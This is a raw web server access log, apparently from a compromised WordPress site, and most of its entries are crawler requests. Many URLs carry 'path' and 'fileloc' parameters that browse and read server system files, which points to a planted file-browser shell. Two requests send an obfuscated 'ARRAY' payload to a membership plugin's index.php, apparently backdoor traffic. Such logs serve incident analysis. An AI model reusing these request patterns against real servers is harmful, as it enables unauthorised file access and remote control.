144.76.32.72 - - [19/Oct/2025:08:25:48 -0400] "GET /hero-02b/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
3.210.114.189 - - [19/Oct/2025:08:25:51 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=/home/wwwrenee/public_html/Backup/wp-content/themes/twentytwentytwo/inc/patterns/query-large-titles.php&path=/home/wwwrenee/public_html/Backup/wp-content/themes/twentytwentytwo/inc/patterns HTTP/1.1" 200 3110 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
144.76.32.72 - - [19/Oct/2025:08:25:51 -0400] "GET /hero-02c/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:25:55 -0400] "GET /our-blog/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:25:58 -0400] "GET /partnerships/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:01 -0400] "GET /review_1-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
20.171.207.185 - - [19/Oct/2025:08:26:05 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/node_modules/npm/man/es HTTP/1.1" 200 3019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
144.76.32.72 - - [19/Oct/2025:08:26:05 -0400] "GET /review_2-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:08 -0400] "GET /review_3-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
66.249.79.201 - - [19/Oct/2025:08:26:08 -0400] "GET /goods/664689690.phtml HTTP/1.1" 200 21249 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
144.76.32.72 - - [19/Oct/2025:08:26:12 -0400] "GET /tag/self/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:18 -0400] "GET /zing-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:22 -0400] "GET /analytics-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:25 -0400] "GET /course-05/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:29 -0400] "GET /course-06/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:32 -0400] "GET /courses-2/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:35 -0400] "GET /digit-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:39 -0400] "GET /mapmaster-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:42 -0400] "GET /tag/be-better/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:46 -0400] "GET /62349-1920-jpg/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:49 -0400] "GET /analytics1-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:52 -0400] "GET /analytics2-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
54.85.7.119 - - [19/Oct/2025:08:26:55 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?path=/home/wwwrenee/public_html/wp-content/plugins/js_composer/assets/lib/bower/zoom HTTP/1.1" 200 2990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
144.76.32.72 - - [19/Oct/2025:08:26:56 -0400] "GET /analytics4-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:26:59 -0400] "GET /bolier-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:13 -0400] "GET /cleanstart/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:16 -0400] "GET /coach-login?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:19 -0400] "GET /fifthflour-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:23 -0400] "GET /head51-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:26 -0400] "GET /icon___-01-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:30 -0400] "GET /icon___-03-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
154.54.249.196 - - [19/Oct/2025:08:27:36 -0400] "GET /peli-casinot/?path=/home/wwwrenee/public_html/wp-admin HTTP/1.1" 200 6659 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
185.191.171.13 - - [19/Oct/2025:08:27:36 -0400] "GET /pelaa-honey-rush-kolikkopeli%C3%A4/ HTTP/1.1" 200 3912 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
144.76.32.72 - - [19/Oct/2025:08:27:36 -0400] "GET /icon___-05-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:40 -0400] "GET /icon___-06-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
52.73.6.26 - - [19/Oct/2025:08:27:43 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//lib/node_modules/npm/man/man1/b2sum.1.gz&path=//lib/node_modules/npm/man/man1 HTTP/1.1" 200 2496 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
144.76.32.72 - - [19/Oct/2025:08:27:43 -0400] "GET /login-register/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:47 -0400] "GET /lp-profile/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:27:50 -0400] "GET /madrin-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:00 -0400] "GET /print_time-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
18.206.47.187 - - [19/Oct/2025:08:28:03 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//lib/.build-id/16/66f7572762007e784846436f0e5b996eca014d&path=//lib/.build-id/16 HTTP/1.1" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
144.76.32.72 - - [19/Oct/2025:08:28:03 -0400] "GET /privacy-policy/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:07 -0400] "GET /team-6-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:10 -0400] "GET /team-7-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:14 -0400] "GET /team-8-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:17 -0400] "GET /u_magazine-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:27 -0400] "GET /cleanstart2/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:31 -0400] "GET /course-01-2/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:34 -0400] "GET /larozse-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:37 -0400] "GET /lp-checkout/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:41 -0400] "GET /phone-x-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:44 -0400] "GET /placeholder-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:51 -0400] "GET /team-19-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:55 -0400] "GET /team-20-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:28:58 -0400] "GET /team-22-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:01 -0400] "GET /team-24-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
20.171.207.185 - - [19/Oct/2025:08:29:08 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/.build-id/92 HTTP/1.1" 200 4368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
144.76.32.72 - - [19/Oct/2025:08:29:08 -0400] "GET /armond-1-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
100.29.63.24 - - [19/Oct/2025:08:29:11 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?path=//proc/thread-self/root/proc/irq/36 HTTP/1.1" 200 3127 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.185 - - [19/Oct/2025:08:29:11 -0400] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/.build-id/51 HTTP/1.1" 200 4836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
144.76.32.72 - - [19/Oct/2025:08:29:12 -0400] "GET /become-a-teacher/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:15 -0400] "GET /darkside-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
216.73.216.109 - - [19/Oct/2025:08:29:18 -0400] "GET /team-19-jpg/?fileloc=%2F%2Flib64%2Fpython3.8%2Ftempfile.py&path=%2F%2Flib64%2Fpython3.8 HTTP/1.1" 200 10157 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
144.76.32.72 - - [19/Oct/2025:08:29:18 -0400] "GET /partnerships/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:22 -0400] "GET /review_1-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:25 -0400] "GET /review_2-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
185.61.153.74 - - [19/Oct/2025:08:24:08 -0400] "GET /wp-content/plugins/paid-memberships-pro/blocks/account-links-section/account-links-section/index.php?ARRAY=7o2230223n313736303838303234382p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303837363634382q6166346232336461333036373262306363373232326362323563653633326265222p2232223n223862336165643031663365336132346539366661636531323262346563663437222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q33372q35362q36342q37332q38392q3134227q HTTP/1.1" 200 52 "-" "-"
144.76.32.72 - - [19/Oct/2025:08:29:29 -0400] "GET /review_3-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:32 -0400] "GET /x-venox_-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
102.218.215.24 - - [19/Oct/2025:08:29:34 -0400] "GET /.well-known/acme-challenge/6Q7JPXVXXWKQOMO3M06RRTJ4FIKUFUY- HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
102.218.215.24 - - [19/Oct/2025:08:29:34 -0400] "GET /.well-known/acme-challenge/OQMX7GIG3-FQX9LFGKR56VDW8SN4CM-I HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
102.218.215.24 - - [19/Oct/2025:08:29:34 -0400] "GET /.well-known/acme-challenge/CTULHWXWB41-UNJL5QU0P-MPI_A385NB HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
216.73.216.109 - - [19/Oct/2025:08:29:34 -0400] "GET /team-19-jpg/?fileloc=%2F%2Frun%2Futmp&path=%2F%2Frun HTTP/1.1" 200 2452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
144.76.32.72 - - [19/Oct/2025:08:29:35 -0400] "GET /analytics-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
185.61.153.74 - - [19/Oct/2025:08:29:38 -0400] "GET /.well-known/acme-challenge/IHADP-TOG2WCDOVQOZ04LGO4MTHIUQ7K HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
185.61.153.74 - - [19/Oct/2025:08:29:38 -0400] "GET /.well-known/acme-challenge/T_SJZY3UNSYJ9RYIBWV7IF7VJURZVUVQ HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
185.61.153.74 - - [19/Oct/2025:08:29:39 -0400] "GET /.well-known/acme-challenge/OQRNWJRFF0R608L6KRXNPSMI33EFNV1Y HTTP/1.1" 404 - "-" "Cpanel-HTTP-Client/1.0"
144.76.32.72 - - [19/Oct/2025:08:29:39 -0400] "GET /cart/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:42 -0400] "GET /celerony-img3-jpg/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:46 -0400] "GET /experts_3_org-jpg/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:49 -0400] "GET /logo/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:52 -0400] "GET /mapmaster-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:29:56 -0400] "GET /placeholder-png-3/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:02 -0400] "GET /tag/be-better/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:06 -0400] "GET /1470399671_seo-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:09 -0400] "GET /62349-1920-jpg/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:13 -0400] "GET /analytics1-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:20 -0400] "GET /analytics4-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:26 -0400] "GET /fifthflour-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:30 -0400] "GET /icon___-01-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
185.61.153.74 - - [19/Oct/2025:08:24:50 -0400] "GET /wp-content/plugins/paid-memberships-pro/blocks/account-links-section/account-links-section/index.php?ARRAY=7o2230223n313736303838303239302p2231223n22687474703n5p2s5p2s7n7334383076313373752r696r6574746s2r6q655p2s3s6p633q7068705s636s64655s6n6326743q313736303837363639302q6166626165343135363664366338366563643265656265363236393737613530222p2232223n223862336165643031663365336132346539366661636531323262346563663437222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q33372q35362q36342q37332q38392q3134227q HTTP/1.1" 200 52 "-" "-"
144.76.32.72 - - [19/Oct/2025:08:30:33 -0400] "GET /icon___-03-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:36 -0400] "GET /icon___-04-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:40 -0400] "GET /icon___-05-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:47 -0400] "GET /login-register/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:50 -0400] "GET /logo2/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:54 -0400] "GET /logo3/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:30:57 -0400] "GET /photo-1for-web/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:00 -0400] "GET /print_time-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:04 -0400] "GET /privacy-policy/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:07 -0400] "GET /rogue_magazine-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:10 -0400] "GET /u_magazine-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
20.171.207.185 - - [19/Oct/2025:08:31:20 -0400] "GET /?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/.build-id/77/1d50268002fb5575c916d7ef1453d75f22a92c&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/.build-id/77 HTTP/1.1" 200 2618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
144.76.32.72 - - [19/Oct/2025:08:31:21 -0400] "GET /experts_1_org-1-jpg/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:24 -0400] "GET /placeholder-png/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
3.218.35.239 - - [19/Oct/2025:08:31:27 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//lib/.build-id/66/0fde9c5cf1d4903b587886312b9d46d794c44a&path=//lib/.build-id/66 HTTP/1.1" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
144.76.32.72 - - [19/Oct/2025:08:31:27 -0400] "GET /videos/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:31 -0400] "GET /viral-marketing-png/?path=/ HTTP/1.1" 200 3155 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
